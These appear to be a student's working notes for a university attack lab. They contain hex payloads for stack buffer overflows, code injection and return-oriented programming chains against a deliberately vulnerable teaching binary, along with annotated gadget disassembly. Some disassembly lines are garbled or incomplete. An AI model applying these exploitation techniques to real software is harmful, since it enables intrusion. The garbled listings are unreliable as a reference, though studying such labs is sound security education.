Level 1
0x401838 //address of touch1
//wants 24 bytes
//in exploit.txt
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
38 18 40 00 00 00 00 00
unix> cat exploit.txt | ./hex2raw | ./ctarget
----------------------
Level 2
//mov $cookie, %rdi
0000000000000000 <.text>:
   0:   48 c7 c7 53 8d 3f 53    mov    $0x533f8d53,%rdi
   7:   c3                      retq
//byte sequence of objdump
48 c7 c7 53 8d 3f 53 c3
//call touch2, 0x401864
64 18 40 00 00 00 00 00
//address of %rdi, address of injected code
0x556179c8
//in exploit.txt
48 c7 c7 53 8d 3f 53 c3 //instruc for entering with cookie
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
c8 79 61 55 00 00 00 00 //address in %rdi, injected code
64 18 40 00 00 00 00 00 //call touch2
———————————-----------
Level 3
//two functions: hex match and touch3
//address of touch3 0x401938
38 19 40 00 00 00 00 00

enter with cookie //0x533f8d53
buffer: two empty rows
touch3 takes in a char ptr 
call touch3: get byte representation of:
	mov $addressofstring, %rid
	retq
hexmatch takes in cookie and char: 3 push instructions, overwrite 24 bytes
strncmp: 1 push instruction, overwrite total of 32 bytes

// address to point to: top of rsp
0x556179c8

enter with cookie //0x533f8d53

0x556179f0//original value of rsp when enters test!

0000000000000000 <.text>:
   0:   48 c7 c7 f0 79 61 55    mov    $0x556179f0,%rdi
   7:   c3                      retq

//in exploit.txt
48 c7 c7 f0 79 61 55 c3 //instruc to move orig val of rap to rdi
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
c8 79 61 55 00 00 00 00 //address in %rdi, injected code
38 19 40 00 00 00 00 00 //ret of touch3
35 33 33 66 38 64 35 33 //ascii rep of cookie
00
——————————
Level 4
00000000004019c0 <start_farm>:
  4019c0:	b8 01 00 00 00       	mov    $0x1,%eax
  4019c5:	c3                   	retq   

00000000004019c6 <setvalob_265>:
  4019c6:	xx xx xx 48 89 c7    	movl   $0xc78948ff,(%rdi) // %rax, %rdi //add cookie!
  4019cc:	                   	retq   

00000000004019cd <getval_377>:
  4019cd:	 c9 c7 90       	mov    $0x90c7c948,%eax //
  4019d2:	c3                   	retq   

00000000004019d3 <getval_193>:
  4019d3:	58 91 90 c3       	mov    $0xc3909158,%eax //pop %rax
  4019d8:	c3                   	retq   

00000000004019d9 <addval_347>:
  4019d9:	 xx xx xx 58 90 90    	lea    -0x6f6fa78e(%rdi),%eax //popq %rax nop nop
  4019df:	c3                   	retq   

00000000004019e0 <addval_333>:
  4019e0:	 25 58 92    	lea    -0x6da7da52(%rdi),%eax // … popq %rax …
  4019e6:	c3                   	retq   

00000000004019e7 <getval_217>:
  4019e7:	 89 c7 c3       	mov    $0xc3c78958,%eax // %eax, %edi
  4019ec:	c3                   	retq   

00000000004019ed <setval_390>:
  4019ed:	 90 c3 cc    	movl   $0xccc39058,(%rdi) // 
  4019f3:	c3                   	retq   

00000000004019f4 <setval_372>:
  4019f4:	89 c7 c3    	movl   $0xc3c78948,(%rdi) // %eax, %edi
  4019fa:	c3                   	retq   


48 c7 c7 53 8d 3f 53 c3 //instruc for entering with cookie 
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
c8 79 61 55 00 00 00 00 //address in %rdi, injected code
64 18 40 00 00 00 00 00 //call touch2 

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
dc 19 40 00 00 00 00 00 //pop %rax (grabs cookie)
53 8d 3f 53 00 00 00 00 //cookie to enter touch2
c9 19 40 00 00 00 00 00 // %rax, %rdi
64 18 40 00 00 00 00 00 //call touch2


cookie: 0x533f8d53
touch2: 0x401864
test: 0x40199c
pop: 00000000004019dc //add 3 bc o address!
%rax, %rdi: 00000000004019c9 //add 3 bc address!
———————
Level 5

00000000004019fb <mid_farm>:
  4019fb:	b8 01 00 00 00       	mov    $0x1,%eax
  401a00:	c3                   	retq  

0000000000401a01 <add_xy>:
  401a01:	8d 04 37          	lea    (%rdi,%rsi,1),%rax
  401a05:	c3                   	retq   

0000000000401a06 <addval_362>:
  401a06:	ca 20 c0    	lea    -0x3fdf3557(%rdi),%eax
  401a0c:	c3                   	retq   

0000000000401a0d <getval_427>:
  401a0d:	48 89 e0 c3       	mov    $0xc3e08948,%eax // movq %rsp, %rax
  401a12:	c3                   	retq   

0000000000401a13 <setval_382>:
  401a13:	c1 08 c9    	movl   $0xc908c189,(%rdi) // .. or %cl, %cl
  401a19:	c3                   	retq   

0000000000401a1a <addval_371>:
  401a1a:	ca 84 c9    	lea    -0x367b3567(%rdi),%eax // .. test %cl, %cl
  401a20:	c3                   	retq   

0000000000401a21 <setval_339>:
  401a21:	c1 84 d2    	movl   $0xd284c189,(%rdi) // .. test %dl, %dl
  401a27:	c3                   	retq   

0000000000401a28 <getval_448>:
  401a28:	89 c1 94 c3       	mov    $0xc394c189,%eax // movl %eax, %ecx //xchng %ecx, %esp
  401a2d:	c3                   	retq   

0000000000401a2e <setval_231>:
  401a2e:	d6 38 c0    	movl   $0xc038d6c9,(%rdi) // .. cmp %al, %al
  401a34:	c3                   	retq   

0000000000401a35 <addval_340>:
  401a35:	89 ca 78 db    	lea    -0x24873577(%rdi),%eax // %ecx, %edx
  401a3b:	c3                   	retq   

0000000000401a3c <getval_226>:
  401a3c:	89 e0 92       	mov    $0x92e08948,%eax // movl %esp, %eax
  401a41:	c3                   	retq   

0000000000401a42 <setval_367>:
  401a42:	48 8b e0    	movl   $0xe08b48e6,(%rdi) //
  401a48:	c3                   	retq   

0000000000401a49 <addval_201>:
  401a49:	c1 20 c0    	lea    -0x3fdf3e7f(%rdi),%eax //
  401a4f:	c3                   	retq   

0000000000401a50 <getval_132>:
  401a50:	89 d6 48 c0       	mov    $0xc048d689,%eax // movl %edx, %esi
  401a55:	c3                   	retq   

0000000000401a56 <setval_153>:
  401a56:	89 c1 90 c2    	movl   $0xc290c189,(%rdi) // movl %eax, %ecx //ruins stack
  401a5c:	c3                   	retq   

0000000000401a5d <addval_323>:
  401a5d:	89 e0 92    	lea    -0x6d1f76b8(%rdi),%eax // movl %esp, %eax
  401a63:	c3                   	retq   

0000000000401a64 <getval_109>:
  401a64:	48 c9 e0       	mov    $0xe0c94812,%eax //
  401a69:	c3                   	retq   

0000000000401a6a <addval_326>:
  401a6a:	89 ca 38 d2    	lea    -0x2dc73577(%rdi),%eax // movl %ecx, %edx
  401a70:	c3                   	retq   

0000000000401a71 <getval_494>:
  401a71:	89 e0 92       	mov    $0x92e08948,%eax // movl %esp, %eax
  401a76:	c3                   	retq   

0000000000401a77 <getval_259>:
  401a77:	d6 38 db       	mov    $0xdb38d699,%eax // cmp %bl, %bl
  401a7c:	c3                   	retq   

0000000000401a7d <addval_223>:
  401a7d:	8d c1 c3    	lea    -0x3c3e724d(%rdi),%eax //
  401a83:	c3                   	retq   

0000000000401a84 <setval_218>:
  401a84:	89 ca c2    	movl   $0xc2ca894e,(%rdi) // movl %ecx, %edx
  401a8a:	c3                   	retq   

0000000000401a8b <setval_213>:
  401a8b:	89 e0 c3    	movl   $0xc3e0894a,(%rdi) //movl %esp, %eax
  401a91:	c3                   	retq   

0000000000401a92 <setval_366>:
  401a92:	89 d6 00 c0    	movl   $0xc000d689,(%rdi) // movlx %edx, %esi
  401a98:	c3                   	retq   

0000000000401a99 <setval_301>:
  401a99:	d6 08 c0    	movl   $0xc008d688,(%rdi) //
  401a9f:	c3                   	retq   

0000000000401aa0 <setval_178>:
  401aa0:	ca 08 c9    	movl   $0xc908ca89,(%rdi) //or %cl, %cl
  401aa6:	c3                   	retq   

q <getval_397>:
  401aa7:	89 c1 90 c7       	mov    $0xc790c189,%eax // %eax, %ecx //ret to sbb %cl, %cl
  401aac:	c3                   	retq   

0000000000401aad <setval_314>:
  401aad:	89 ca 18 c9    	movl   $0xc918ca89,(%rdi) // %ecx, %edx
  401ab3:	c3                   	retq   

0000000000401ab4 <addval_131>:
  401ab4:	89 d6 08 c0    	lea    -0x3ff72977(%rdi),%eax // %edx, %esi
  401aba:	c3                   	retq   

0000000000401abb <addval_196>:
  401abb:	89 d6 08 c0    	lea    -0x3ff72977(%rdi),%eax //  %edx, %esi
  401ac1:	c3                   	retq   

0000000000401ac2 <addval_238>:
  401ac2:	89 c1 28 c9    	lea    -0x36d73e77(%rdi),%eax // %eax, %ecx //sub %cl, %cl
  401ac8:	c3                   	retq   

 <addval_289>:
  401ac9:	d6 08 db    	lea    -0x24f72978(%rdi),%eax // 
  401acf:	c3                   	retq   

0000000000401ad0 <addval_171>:
  401ad0:	89 ca c7 79    	lea    0x79c7ca89(%rdi),%eax // %ecx, %edx
  401ad6:	c3                   	retq   

0000000000401ad7 <getval_424>:
  401ad7:	89 e0 c3       	mov    $0xc3e08948,%eax // movl %esp, %eax
  401adc:	c3                   	retq   

0000000000401add <end_farm>:
  401add:	b8 01 00 00 00       	mov    $0x1,%eax
  401ae2:	c3                   	retq   
  401ae3:	66 2e 0f 1f 84 00 00 	nopw   %cs:0x0(%rax,%rax,1)
  401aea:	00 00 00 
  401aed:	0f 1f 00             	nopl   (%rax)

//level 3
48 c7 c7 f0 79 61 55 c3 //instruc to move orig val of rsp to rdi
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
c8 79 61 55 00 00 00 00 //address in %rdi, injected code
38 19 40 00 00 00 00 00 //ret of touch3
35 33 33 66 38 64 35 33 //ascii rep of cookie
00


00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
0e 1a 40 00 00 00 00 00 //movq %rsp, %rax
c9 19 40 00 00 00 00 00 //movq %rax, %rdi
dc 19 40 00 00 00 00 00 //pop %rax
48 00 00 00 00 00 00 00 //what’s popped into %rax
23 1a 40 00 00 00 00 00 // mov %eax, %ecx //destroys itself
6c 1a 40 00 00 00 00 00 // mov %ecx, %edx
94 1a 40 00 00 00 00 00 // mov %edx, %esi 
01 1a 40 00 00 00 00 00 //lea    (%rdi,%rsi,1),%rax
c9 19 40 00 00 00 00 00 //movq %rax, %rdi
38 19 40 00 00 00 00 00 //ret of touch3
35 33 33 66 38 64 35 33 //ascii rep of cookie


0000000000401a0d + 1 // movq %rsp, %rax
00000000004019c6 + 3 // movq %rax, %rdi
00000000004019d9 + 3 // popq %rax…
//value of 24
0000000000401a21 + 2 // mov %eax, %ecx

0000000000401a6a + 2// mov %ecx, %edx
0000000000401a92 + 2 // mov %edx, %esi 
0000000000401a01 // lea    (%rdi,%rsi,1),%rax
00000000004019c6 + 3 // movq %rax, %rdi



